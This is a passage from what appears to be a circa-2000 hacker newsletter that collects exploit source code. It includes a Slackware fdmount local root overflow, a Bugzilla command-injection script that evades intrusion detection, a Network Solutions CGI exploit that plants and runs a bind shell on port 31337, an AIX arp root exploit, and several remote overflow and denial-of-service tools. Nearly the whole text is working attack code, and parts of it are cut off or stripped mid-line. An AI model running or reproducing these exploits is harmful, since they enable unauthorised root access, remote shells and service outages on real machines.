IPPROTO_TCP)) < 0) { perror("socket()"); return -1; } if ((he = gethostbyname(argv[1])) != NULL) { ip = *(unsigned long *)he->h_addr; } else { if ((ip = inet_addr(argv[1])) == NULL) { perror("inet_addr()"); return -1; } } sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip; sin.sin_port = htons(8080); fprintf(stderr,"\nEngaged...\n"); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect()"); return -1; } if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) { perror("write()"); return -1; } 
fprintf(stderr,"Bye Bye baby!...\n\n"); if (close(sock) < 0) { perror("close()"); return -1; } return(0); } /* www.hack.co.za [18 May]*/ @HWA 259.0 [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ronald@grafix.nl /* Welcome dear reader - be it scriptkiddy, whose sole intent it is to destroy precious old Unix boxes or Assembly Wizard whose sole intent it is to correct my code and send me a flame. The fdutils package contains a setuid root file that is used by the floppy group to mount and unmount floppies. If you are not in this group, this exploit will not work. This thingy was tested on Slackware 4.0 and 7.0 Use as: fdmount-exp [offset] [buf size] [valid text ptr] Since the char * text is overwritten in void errmsg(char *text) we should make sure that this points to a valid address (something in the .data section should do perfectly). The hard coded one used works on my box, to find the one you need use something like: objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \ cut -d " " -f1 The HUGE number of nops is needed to make sure this exploit works. Since it Segfaults out of existence without removing /etc/mtab~ we only get one try... Take care with your newly aquired EUID 0! 
Cheers go out to: #phreak.nl #b0f #hit2000 #root66 The year 2000 scriptkiddie award goed to: Gerrie Mansur Love goes out to: Hester, Maja (you're so cute!), Dopey -- Yours truly, Scrippie - ronald@grafix.nl - buffer0verfl0w security - #phreak.nl */ #include #define NUM_NOPS 500 // Gee, Aleph1 his shellcode is back once more char shellcode[] = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { int buf_size = 71; int offset=0, i; char *overflow; char *ovoff; long addr, ptr=0x0804c7d0; if(argc>1) offset = atoi(argv[1]); if(argc>2) buf_size = atoi(argv[2]); if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16); printf("##############################################\n"); printf("# fdmount Slack 4/7 exploit - by Scrippie #\n"); printf("##############################################\n"); printf("Using offset: %d\n", offset); printf("Using buffer size: %d\n", buf_size); printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr); if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) { fprintf(stderr, "Outta memory - barging out\n"); exit(-1); } overflow[0] = '/'; for(i=1;i #include #include #include #include #include #ifdef __OpenBSD__ #include #include struct pcap { int fd; /* Who cares what else is in there? */ }; #endif /* __OpenBSD__ */ /* This simulates the {old|new} pcap_immediate() function. It may not do * anything on some platforms. */ int my_pcap_immediate(pcap_t *p) { /* Thanks to Michael T. Stolarchuk for the bit to do this and * lots of other info besides. 
*/ #ifdef __OpenBSD__ unsigned int value=1; struct pcap *sp=(struct pcap*)p; /* I don't know that this jives with what pcap_immediate() is * supposed to return, but the pcap man page only specifies that * error == -1 */ return ioctl(sp->fd,BIOCIMMEDIATE,&value); #else return -1; #endif /* __OpenBSD__ */ } /* I'm making this stuff up. I don't actually *know* the NIS protocol, * just what I get on a packet dump. */ /* Assume 32 bit arch... */ struct nisquery_st { u_int serial; char dragons[36]; /* I see 86a4 in all the dragons, even on Linux. I wonder what that's about. */ u_int dom_len; char domainname[1024]; u_int map_len; char mapname[1024]; u_int key_len; char key[1024]; }; /* More guesswork */ char voodoo[]={ 0,0, 0,1,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0, 0,0,0,0,0,1}; struct nisresponse_st { u_int serial; char magic[sizeof(voodoo)]; u_int resp_len; char resp[1024]; }; #define MAC_HEADER_LEN 14 #define PACKET_SIZE 4096 #define PROMISC 1 /***************/ /* Global Vars */ /***************/ struct nisquery_st nq; struct nisresponse_st nr; pcap_t *sniffer; u_short port=0; char hostname[64],etherdev[64],key[64],map[64],domain[64]; u_char *ippacket; int rawsock; /***************/ /***************/ /***************/ void usage(FILE *out,char *name) { fprintf(out,"Usage %s -h -p -r -i " "-k -m -d \n",name); } void set_options(int argc,char **argv) { char ch; while((ch=getopt(argc, argv, "p:h:r:i:m:d:k:"))!=-1) { switch(ch) { case 'm': strncpy(map,optarg,sizeof(map)); map[sizeof(map)-1]=0; break; case 'd': strncpy(domain,optarg,sizeof(domain)); domain[sizeof(domain)-1]=0; break; case 'k': strncpy(key,optarg,sizeof(key)); key[sizeof(key)-1]=0; break; case 'p': port=atoi(optarg); break; case 'h': strncpy(hostname,optarg,sizeof(hostname)); hostname[sizeof(hostname)-1]=0; break; case 'i': strncpy(etherdev,optarg,sizeof(etherdev)); etherdev[sizeof(etherdev)-1]=0; break; case 'r': strncpy(nr.resp,optarg,sizeof(nr.resp)); nr.resp[sizeof(nr.resp)]=0; nr.resp_len=strlen(nr.resp); 
      nr.resp_len=htonl(nr.resp_len);
      break;
    case '?':
    default:
      usage(stderr,argv[0]);
      exit(1);
    }
  }
}

/*
int open_rawsock(void) {
  int rawsock,val=1;

  if((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
    perror("socket");
    exit(1);
  }
  if(setsockopt(rawsock,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0) {
    perror("setsockopt");
    exit(1);
  }
  return rawsock;
}
*/

int open_rawsock(void) {
  int rawsock;

  if(libnet_init_packet(PACKET_SIZE,&ippacket)==-1) {
    perror("libnet_init_packet");
    exit(1);
  }
  if((rawsock=libnet_open_raw_sock(IPPROTO_RAW))==-1) {
    perror("libnet_open_raw_sock");
    exit(1);
  }
  return rawsock;
}

pcap_t *open_sniffer(void) {
  char filterstr[1024],errbuf[4096];
  pcap_t *capdev;
  struct bpf_program filter;
  int localnet=0,netmask=0;

  sprintf(filterstr,"dst host %s and udp and dst port %d",hostname,port);
  printf("Filter: \"%s\"\n",filterstr);
  if((capdev=pcap_open_live(etherdev,PACKET_SIZE,PROMISC,1,errbuf))==NULL) {
    fprintf(stderr,"pcap_open_live: %s\n",errbuf);
    exit(1);
  }
  if(pcap_lookupnet(etherdev,&localnet,&netmask,errbuf)) {
    fprintf(stderr,"pcap_lookupnet: %s\n",errbuf);
    exit(1);
  }
  if(pcap_compile(capdev,&filter,filterstr,1,netmask)) {
    pcap_perror(capdev,"pcap_compile");
    exit(1);
  }
  if(pcap_setfilter(capdev,&filter)) {
    pcap_perror(capdev,"pcap_setfilter");
    exit(1);
  }
  my_pcap_immediate(capdev);
  return capdev;
}

/* Send a response to buf */
void send_response(char *buf,int len) {
  int i;
  u_char ihl=4*(0xF&(u_char)buf[MAC_HEADER_LEN]);
  u_char scratch[4];
  u_short tlen,rlen,payload_len;

  buf+=MAC_HEADER_LEN;
  rlen=0xFFFF&(ntohl(nr.resp_len) + ((ntohl(nr.resp_len)%4)?4-(ntohl(nr.resp_len)%4):0));
  bzero(ippacket,sizeof(ippacket));
  nr.serial=nq.serial;
  bcopy(buf,ippacket,len);
  /* printf("##############################################\n"); */
  payload_len=sizeof(nr)-sizeof(nr.resp)+rlen;
  bcopy(&nr,ippacket+len,payload_len);
  tlen=len+payload_len;
  /* for(i=0;i\\\|\'\`])/sprintf("%%%x",ord($1))/ge;
    $url =~ s/\ /+/g;
    $url =~s/\//\/.\//g;
    return $url;
}
#end of stolen stuff

($complete_url,
 $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV);

print("Exploit for Bugzilla up to version 2.8\n");
print(" by {} - karin\@root66.nl.eu.org\n");
print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
print("RooT66 - http://root66.nl.eu.org\n");
print("ShellOracle - http://www.shelloracle.cjb.net\n");
print("b0f - http://b0f.freebsd.lublin.pl\n");
print("\n");

if ($complete_url eq "-h" || $complete_url eq "--help") {
    print("Usage: $0 url emailaddress password command\n");
    exit;
}

# Get information of user
if (!$complete_url) {
    print("URL: ");
    $complete_url = ;
    chomp($complete_url);
    $complete_url =~ s/http:\/\///;
}
if (!$Bugzilla_login) {
    print("EMAIL: ");
    $Bugzilla_login = ;
    chomp($Bugzilla_login);
}
if (!$Bugzilla_password) {
    print("PASSWORD: ");
    $Bugzilla_password = ;
    chomp($Bugzilla_password);
}
if (!$command) {
    print("COMMAND: ");
    $command = ;
    chomp($command);
}

# Set some variables
$host = $complete_url;
$host =~ s/\/.*//;
$base_dir = $complete_url;
$base_dir =~ s/^$host//;
$base_dir =~ s/[a-zA-Z.]*$//;

# Make own directory
system("mkdir $$");

print("Getting information needed to submit our 'bug'\n");

# Get product name
system("cd $$; lynx -source \"http://$host/" .
       antiIDS("$base_dir/enter_bug.cgi") .
       "?Bugzilla_login=" . antiIDS("$Bugzilla_login") .
       "&Bugzilla_password=" . antiIDS("$Bugzilla_password") .
       "\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = ) {
    if ($input =~ /enter_bug.cgi\?product=/) {
        chomp($input);
        $product = $input;
        $product =~ s/.*product=//;
        $product =~ s/".*//;
        if ($product =~ /\&component=/) {
            $component = $product;
            $product =~ s/&.*//; # strip component
            $component =~ s/.*component=//;
            $component =~ s/".*//;
        }
    }
}
print("\tProduct: $product\n");
if ($component) {
    print("\tComponent: $component\n");
}

# Get more information
$page = antiIDS("$base_dir/enter_bug.cgi?") .
        "product=" . antiIDS("$product") .
        "&Bugzilla_login=" . antiIDS("$Bugzilla_login") .
        "&Bugzilla_password=" .
        antiIDS("$Bugzilla_password");
system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = ) {
    chomp($input);
    if ($input =~ /Reporter:/) {
        $reporter = $input;
        $reporter =~ s/.*Reporter: //;
        $reporter =~ s/\ .*//;
    }
    if ($input =~ /Version:/) {
        $version = $input;
        $version =~ s/.*Version: \[//;
        $version =~ s/\.*\].*//;
    }
    if ($input =~ /Component:/) {
        $component = $input;
        $component =~ s/.*Component: \[//;
        $component =~ s/\.*\].*//;
    }
    if ($input =~ /Platform:/) {
        $platform = $input;
        $platform =~ s/.*Platform: \[//;
        $platform =~ s/\.*\].*//;
    }
    if ($input =~ /OS:/) {
        $os = $input;
        $os =~ s/.*OS: \[//;
        $os =~ s/\.*\].*//;
    }
    if ($input =~ /Priority:/) {
        $priority = $input;
        $priority =~ s/.*Priority: \[//;
        $priority =~ s/\].*//;
    }
    if ($input =~ /Severity:/) {
        $severity = $input;
        $severity =~ s/.*Severity: \[//;
        $severity =~ s/\.*\].*//;
    }
}
print("\tReporter: $reporter\n");
print("\tVersion: $version\n");
print("\tComponent: $component\n");
print("\tPlatform: $platform\n");
print("\tOS: $os\n");
print("\tPriority: $priority\n");
print("\tSeverity: $severity\n");
close(FILE);

#liftoff
print("Sending evil bug report\n");
$page = antiIDS("$base_dir/process_bug.cgi") .
        "?bug_status=" . antiIDS("NEW") .
        "&reporter=" . antiIDS($reporter) .
        "&product=" . antiIDS("$product") .
        "&version=" . antiIDS("$version") .
        "&component=" . antiIDS("$component") .
        "&rep_platform=" . antiIDS("$platform") .
        "&op_sys=" . antiIDS($os) .
        "&priority=" . antiIDS($priority) .
        "&bug_severity=" . antiIDS($severity) .
        "&who=". antiIDS("blaat\@blaat.com;echo \\START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") .
        "&knob=" . antiIDS("duplicate") .
        "&dup_id=" . antiIDS("202021234123412341234") .
        "&Bugzilla_login=" . antiIDS($Bugzilla_login) .
        "&Bugzilla_password=" . antiIDS($Bugzilla_password) .
        "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug";
system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi");
open(FILE, "< $$/enter_bug.cgi");
while($input = ) {
    chomp($input);
    if ($input =~ /END OUTPUT COMMAND/) {
        $startoutput = 0;
    }
    if ($startoutput) {
        print("$input\n");
    }
    if ($input =~ /START OUTPUT COMMAND/) {
        $startoutput = 1;
    }
}
close(FILE);

# Delete shit
system("rm -rf $$");

# www.hack.co.za [10 May]#

@HWA

262.0 [IND] netsol.c remote cgi exploit by bansh33.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      rishi@felons.org

/*
 * [r00tabega.security.labs]
 * www.r00tabega.com
 * Coded for the network solutions exploit (http://packetstorm.securify.com/0005-exploits/netsolbug.txt)
 * Unfortunately, this no longer works.
 * coded by bansh33 [rishi@felons.org]
 * Binds a shell to port 31337
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define TRUE 0x00000001
#define FALSE 0x00000000
#define ERR 0xffffffff

typedef long sock_t;
typedef u_long ip_t;
typedef u_short port_t;

#define H1 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c|"
#define H2 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c"
#define CODE "GET /cgi-bin/phf?Qalias=x%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c|"
#define COMPILE "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0agcc%20-o%20hi%20hi.c|"
#define THEHACK "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0a%2e%2f%68%69%20|"
#define WHOAMI "uname -a; id;\n"

int main (int, char * *);
void simshell (int);
void send_tcp_conn (char *, ip_t, port_t, int);
sock_t tcp_conn (ip_t, port_t);
ip_t resolve (u_char *);

int main (int argc, char * * argv)
{
  sock_t fd;
  ip_t ipaddr;

  if ((ipaddr = resolve("networksolutions.com")) == ERR) {
    fprintf(stderr, "Couldn't resolve networksolutions.com.\n");
    exit(EXIT_SUCCESS);
  }

  fprintf(stderr, "Network Solutions Exploit by bansh33\n");
  fprintf(stderr, "i take no responsibility for this\n\n");
  fprintf(stderr, "Owning networksolutions.com: ");
  send_tcp_conn(H1, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(H2, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(CODE, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(COMPILE, ipaddr, 80, 0);
  fprintf(stderr, ".");
  send_tcp_conn(THEHACK, ipaddr, 80, 1);
  fprintf(stderr, ".");
  fprintf(stderr, "\nDropping you to a shell...\n");
  fd =
    tcp_conn(ipaddr, 31337);
  send(fd, WHOAMI, strlen(WHOAMI), 0);
  simshell(fd);
}

void simshell (int fd)
{
  char buf[255];
  fd_set in_set;

  while (1) {
    FD_ZERO(&in_set);
    FD_SET(0, &in_set);
    FD_SET(fd, &in_set);
    if ((select(fd + 1, &in_set, 0, 0, NULL))) {
      if (FD_ISSET(fd, &in_set)) {
        memset(buf, 0, 255);
        recv(fd, buf, 255, 0);
        if (!*buf) exit(EXIT_SUCCESS);
        fprintf(stderr, buf);
      }
      else if (FD_ISSET(0, &in_set)) {
        memset(buf, 0, 255);
        read(0, buf, 255);
        send(fd, buf, strlen(buf), 0);
      }
    }
  }
}

void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis)
{
  sock_t fd;

  if ((fd = tcp_conn(ipaddr, port)) > 0)
    send(fd, buf, strlen(buf), 0);
  if (!dis)
    close(fd);
}

sock_t tcp_conn (ip_t addr, port_t port)
{
  sock_t ret;
  struct sockaddr_in sa;

  sa.sin_addr.s_addr = addr;
  sa.sin_port = htons(port);
  sa.sin_family = AF_INET;
  if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR)
    return (ERR);
  else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))) == ERR)
    return (ERR);
  return (ret);
}

ip_t resolve (u_char * host)
{
  struct in_addr addr;
  struct hostent * hp;

  if ((addr.s_addr = inet_addr(host)) == ERR) {
    if (!(hp = gethostbyname(host)))
      return (ERR);
    memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
  }
  return (addr.s_addr);
}
/* EOF */
/* www.hack.co.za [14 May]*/

@HWA

263.0 [IND] napstir.c remote linux misc exploit by S.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      super@udel.edu

/* napstir by Derek Callaway -- S@IRC
 *
 * Exploits a gnapster bug... (probably exists in other clients, too.)
 * Greetings: inNUENdo, s0ftpj, napster
 * I discovered some service denial techniques while coding; see below.
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include

void vexit(const char *func){perror(func);exit(EXIT_FAILURE);}

int main(int argc,char**argv){
  int sock,port,len;
  struct hostent *he;
  char str[4096],buf[4096],*sln,*op,c;
  struct sockaddr_in ta;

  if(argc<3){
    printf("napstir by S\n");
    printf("usage: %s host file [port] [username]\n",argv[0]);
    printf("example: %s metallica.com ",argv[0]);
    printf("\"\\etc\\passwd\" 6699\n");
    printf("default port is 6699\n");
    printf("default username is Lamer (usually not required)\n");
    exit(EXIT_SUCCESS);
  }
  if(!(he=gethostbyname(argv[1])))vexit("gethostbyname");
  ta.sin_family=AF_INET;
  ta.sin_addr=*((struct in_addr*)he->h_addr);
  if(argv[3]){
    port=strtol(argv[3],(char**)0,10);
    if(errno==ERANGE)vexit("strtol");
  }
  else port=6699;
  ta.sin_port=htons(port);
  memset(&ta.sin_zero,0,sizeof(ta.sin_zero));
  if((sock=socket(AF_INET,SOCK_STREAM,0))<0)vexit("socket");
  if(connect(sock,(struct sockaddr*)&ta,sizeof(struct sockaddr))<0)
    vexit("connect");
  /* I wonder what this byte is for. */
  recv(sock,&buf,1,0);
  /* 9 is the code for T1 bitrate -- Most clients ignore the username
   * field. */
  sprintf(str,"%s \"%s\" 9",(argc>=4)?argv[4]:"Lamer",argv[2]);
  send(sock,"GET",3,0);
  send(sock,(char*)str,strlen(str),0);
  /*
   * SERVICE DENIAL CODE
   *
   * Uncomment this line if you'd like to crash knapster. :-)
   * send(sock,"0",1);
   */
  if(!(op=sln=(char*)malloc(1024)))vexit("malloc");
  do {
    read(sock,&c,1);
    sprintf(sln,"%c",c);
    sln++;
  } while(isdigit(c));
  *sln=0;
  sln=op;
  len=strtol(sln,(char**)0,10);
  if(errno==ERANGE)vexit("strtol");
  write(STDOUT_FILENO,&c,1);
  if((port=read(sock,&buf,len-1))<0)vexit("read");
  write(STDOUT_FILENO,buf,port);
  exit(EXIT_SUCCESS);
}
/* www.hack.co.za [14 May]*/

@HWA

264.0 [IND] SSG-arp.c aix 4.1 local overflow by cripto.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      cripto@subterrain.net

/*
 * AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000
 *
 * This code is largely from an old AIX mount exploit by Georgi Guninski.
 * Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340!
 *
 * Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom.
 *
 * -cripto .o0-> SSG ROX 2000 !@#$$#@! <-0o.
 */

#include
#include
#include

#define OFFSET 3580

char prog[100]="/usr/sbin/arp";
char prog2[30]="arp";
extern int execv();

char *createvar(char *name,char *value)
{
  char *retval;
  int l;

  l = strlen(name) + strlen(value) + 4;
  if (! (retval = malloc(l))) {
    perror("malloc");
    exit(2);
  };
  strcpy(retval,name);
  strcat(retval,"=");
  strcat(retval,value);
  putenv(retval);
  return retval;
}

main(int argc,char **argv,char **env)
{
  unsigned int code[]={
    0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
    0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
    0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
    0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
    0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
    0x7c0903a6 , 0x4e800420, 0x0
  };

#define MAXBUF 600
  unsigned int buf[MAXBUF];
  unsigned int frame[MAXBUF];
  unsigned int i,nop,mn;
  int max;
  int QUIET = 0;
  int dobuf = 0;
  char VAR[30] = "LC_MESSAGES";
  unsigned int toc;
  unsigned int eco;
  unsigned int *pt;
  char *t;
  int egg = 1;
  int ch;
  unsigned int reta;
  int corr = 4604;
  char *args[4];
  char *newenv[8];
  int justframes = 1;
  int startwith = 0;

  mn = 78;
  max = 100;

  if (argc > 1) {
    corr = atoi(argv[1]);
  } else {
    corr = OFFSET;
  }

  pt = (unsigned *) &execv;
  toc = *(pt+1);
  eco = *pt;

  if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF)) {
    perror("invalid input");
    exit(1);
  }

#define OO 7
  *((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff);
  *((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) & 0x0000ffff);
  *((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff);
  *((unsigned short *)code + OO + 6
  ) = (unsigned short) ((eco >> 16) & 0x0000ffff);

  reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr;

  for(nop = 0;nop < mn;nop++)
    buf[nop] = startwith ? reta : 0x4ffffb82;

  strcpy((char*)&buf[nop], (char*)&code);
  i = nop + strlen( (char*) &code)/4-1;

  if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000)) {
    perror("Return address has zero");
    exit(5);
  }

  while(i++ < max)
    buf[i] = reta;
  buf[i] = 0;

  for(i = 0;i < max-1;i++)
    frame[i] = reta;
  frame[i] = 0;

  if(QUIET) {
    puts((char*)&buf);
    fflush(stdout);
    exit(0);
  };

  newenv[0] = createvar("EGGSHEL", (char*)&buf[0]);
  newenv[1] = createvar("EGGSHE2", (char*)&buf[0]);
  newenv[2] = createvar("EGGSHE3", (char*)&buf[0]);
  newenv[3] = createvar("EGGSHE4", (char*)&buf[0]);
  newenv[4] = createvar("DISPLAY", getenv("DISPLAY"));
  newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame : (char*)&buf):NULL;
  newenv[6] = NULL;

  args[0] = prog2;
  execve(prog,args,newenv);
  perror("execve\n");
}
/* www.hack.co.za [10 May]*/

@HWA

265.0 [IND] warftpd.c win95 remote dos attack by eth0.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* coded by eth0 from buffer0verfl0w */
/* tested by morpha */
/* *NOTE* Original exploit was coded for winbl0wz *NOTE */
/*
   Vulnerable:
     War FTPd version 1.66x4
     War FTPd version 1.67-3

   Immune:
     War FTPd version 1.67-4
     War FTPd version 1.71-0

   The buffer overflow seems to occur because the bound check of the
   command of MKD/CWD is imperfect. This means that although anyone can
   overflow the statically assigned buffer that stores the requested path,
   you cannot overwrite the RET address and therefore it's impossible to
   cause War FTPd to execute arbitrary code. However, it is a simple
   mechanism for performing a Denial-of-Service against the server.

   Solution:
     War FTPd 1.70-1 does fix this problem, but it contains other
     vulnerabilities (see our additional information section).
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90

#define PASS "PASS eth0@owns.your.ass.com\r\n"
#define LOGIN "USER anonymous\r\n"

int expl0it(char *host)
{
  struct hostent *hp;
  struct in_addr addr;
  struct sockaddr_in s;
  static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
  /* u_char buf[280]; */
  int p, i;

  hp = gethostbyname (host);
  if (!hp) exit (1);
  bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
  p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
  s.sin_port = htons (FTP_PORT);
  s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
  if(connect (p, &s, sizeof (s))!=0) {
    printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
    return;
  }
  else {
    printf("Connected!\n");
    write(p, LOGIN, strlen(LOGIN));
    write(p, PASS, strlen(PASS));
    memset(buf,NOP,MAXBUF);
    buf[MAXBUF-1]=0;
    sprintf((char *)packetbuf,"CWD %s\r\n",buf);
    send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
    printf("DONE!\n");
  }
  return(0);
}

int main(int argc, char *argv[])
{
  if(argc<2) {
    printf("Usage: %s [host] \n",argv[0]);
    return;
  }
  else {
    expl0it(argv[1]);
  }
  return(0);
}
/* www.hack.co.za [10 May]*/

@HWA

266.0 [IND] sniffit.c remote linux misc overflow by fusys.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.s0ftpj.org/

/*
 * Sniffit 0.3.7beta Linux/x86 Remote Exploit
 * ShellCode is a modified version of w00w00 write egg,
 * to pass Sniffit input filter
 *
 * Tested on RedHat 5.2, 6.0, 6.2
 * Proof Of Concept Code
 *
 * credits: |CyraX| for pointing me to the coredump
 *          del0 for hurrying me :)
 *          vecna for offering me drinks ;P
 *          belf for loving and caring his GSM ;P
 *
 * FuSyS [S0ftpj|BFi]
 * http://www.s0ftpj.org/
 */

#include
#include
#include
#include
#include

#define LENGTH 600
#define RET RH6x
#define RH52 0xbfff5c10
#define RH6x 0xbfff5bb5
// 0.3.6HIP 0xbfffcc50
#define OFFSET 0
#define ALIGNOP 3 // 3 RH6.0, 4 RH6.2
                  // may vary [1-5]

/* Note To Script Kiddies: This ShellCode Simply Changes An
   Existing /etc/motd So Don't Bother DownLoading */

unsigned char shellcode[]=
  "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
  "\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4"
  "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31"
  "\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
  "\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77"
  "\x61\x73\x20\x68\x65\x72\x65\x0a";

unsigned long nameResolve(char *hostname)
{
  struct in_addr addr;
  struct hostent *hostEnt;

  if((addr.s_addr=inet_addr(hostname)) == -1) {
    if(!(hostEnt=gethostbyname(hostname))) {
      printf("Name Resolution Error:`%s`\n",hostname);
      exit(0);
    }
    bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
  }
  return addr.s_addr;
}

int main(int argc,char **argv)
{
  char buff[LENGTH+ALIGNOP+1];
  char cmd[610];
  long addr;
  unsigned long sp;
  int offset=OFFSET;
  int i, x;
  int sock;
  struct sockaddr_in sin;

  if(argc<2) {
    fprintf(stderr, "Usage: %s \n", argv[0]);
    exit(0);
  }

  sp=(unsigned long) RET;
  addr=sp-offset;

  for(i=0;i<120-ALIGNOP;i++)
    buff[i]=0x90;
  for(x=0; x> 8;
    buff[i+2] = (addr & 0x00ff0000) >> 16;
    buff[i+3] = (addr & 0xff000000) >> 24;
  }

  printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
  printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");

  memset(&sin,0,sizeof(sin));
  sin.sin_family=AF_INET;
  sin.sin_port=htons(25);
  sin.sin_addr.s_addr=nameResolve(argv[1]);

  printf("Connecting to %s ...\n", argv[1]);

  if((sock=socket(AF_INET,SOCK_STREAM,0))<0) {
    printf("Can't create socket\n");
    exit(0);
  }
